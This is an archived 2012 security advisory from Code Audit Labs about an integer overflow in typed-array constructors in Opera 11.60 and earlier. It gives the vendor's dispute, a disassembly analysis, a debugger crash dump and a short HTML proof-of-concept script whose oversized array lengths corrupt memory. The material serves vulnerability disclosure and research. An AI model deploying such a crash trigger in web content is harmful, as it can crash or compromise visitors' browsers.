what you don't know can hurt you

Opera 11.60 Array Integer Overflow

Opera 11.60 Array Integer Overflow
Posted Feb 3, 2012
Authored by Code Audit Labs | Site vulnhunt.com

Code Audit Labs has discovered an integer overflow vulnerability in array functions like Int32Array, Int16Array, etc in Opera versions 11.60 and below.

tags | exploit, overflow
MD5 | 10c8403b34ee40a75c985f5c03bce81e

Opera 11.60 Array Integer Overflow

Change Mirror Download
CAL-2012-0004 opera array integer overflow


1 Affected Products
=================
11.60 and prior


2 Vulnerability Details
=====================

Code Audit Labs http://www.vulnhunt.com has discovered a integer
overflow vulnerability in array functions like
Int32Array,Int16Array... .

Opear vendor say "We have reproduced the problem, and determined that it
does not have any security implications, since the crash is a caused by
a memory fill operation which the webpage have no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue. "


we still insist on that it is a security issue or not should accord to
root cause of this bug instead of is it exploitable or not. because you
think it is unexploitable, someone can exploit it via deeply research.

So if most people of Security Community think this is a security issue,
please assign to a CVE number.


3 Analysis
=========
Int16Array(2147483647) example
memory corrupt happen if satisfy with following Conditions
1: x*2 >2
2:x*2!=00
3: (x*2-1)+0x1f overflow 32bits.

so the length of malloc is (x*2-1)+0x1f
memset(eax+0x10,0,x*2) cause memory corrupt


text:5C769F57
.text:5C769F57 loc_5C769F57: ; CODE XREF:
sub_5C769DCE+17Cj
.text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
.text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is
80000001
.text:5C769F60 cmp eax, [esp+48h+var_3C]
.text:5C769F64 jb short loc_5C769F37
.text:5C769F66 mov [esp+48h+size], eax
.text:5C769F6A mov eax, [ebp+arg_0]
.text:5C769F6D call sub_5C14A6E8
.text:5C769F72 push [esp+48h+size] ; size
.text:5C769F76 push dword ptr [eax] ; int
.text:5C769F78 push [ebp+arg_0] ; int
.text:5C769F7B call sub_5C765B6D
.text:5C769F80 add esp, 0Ch

...

.text:5C46A598
.text:5C46A598 arg_0 = dword ptr 4
.text:5C46A598 size = dword ptr 8
.text:5C46A598
.text:5C46A598 mov edx, [esp+arg_0]
.text:5C46A59C push esi
.text:5C46A59D mov esi, [esp+4+size]
.text:5C46A5A1 test esi, esi
.text:5C46A5A3 jz short loc_5C46A5AA
.text:5C46A5A5 lea eax, [esi-1]
.text:5C46A5A8 jmp short loc_5C46A5AC
.text:5C46A5AA ;
---------------------------------------------------------------------------
.text:5C46A5AA
.text:5C46A5AA loc_5C46A5AA: ; CODE XREF:
sub_5C46A598+Bj
.text:5C46A5AA xor eax, eax
.text:5C46A5AC
.text:5C46A5AC loc_5C46A5AC: ; CODE XREF:
sub_5C46A598+10j
.text:5C46A5AC mov ecx, [edx+8]
.text:5C46A5AF add eax, 1Fh
.text:5C46A5B2 push 0
.text:5C46A5B4 and eax, 0FFFFFFF8h
.text:5C46A5B7 push eax
.text:5C46A5B8 push edx
.text:5C46A5B9 call sub_5C019DA0

ext:5C765BF7 loc_5C765BF7: ; CODE XREF:
sub_5C765B6D+50j
.text:5C765BF7 push [ebp+size] ; size
.text:5C765BFA lea eax, [ebx+10h]
.text:5C765BFD push 0 ; c
.text:5C765BFF push eax ; dst
.text:5C765C00 call memset




4 Exploitable?
============
who known?


5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na
pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010207
*** ERROR: Symbol file could not be found. Defaulted to export symbols
for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0
ds:0023:03680000=????????????????????????????????
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be
wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c



6 POC:
====
open a html with following content

<script>
//这些全是crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>




7 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    3 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close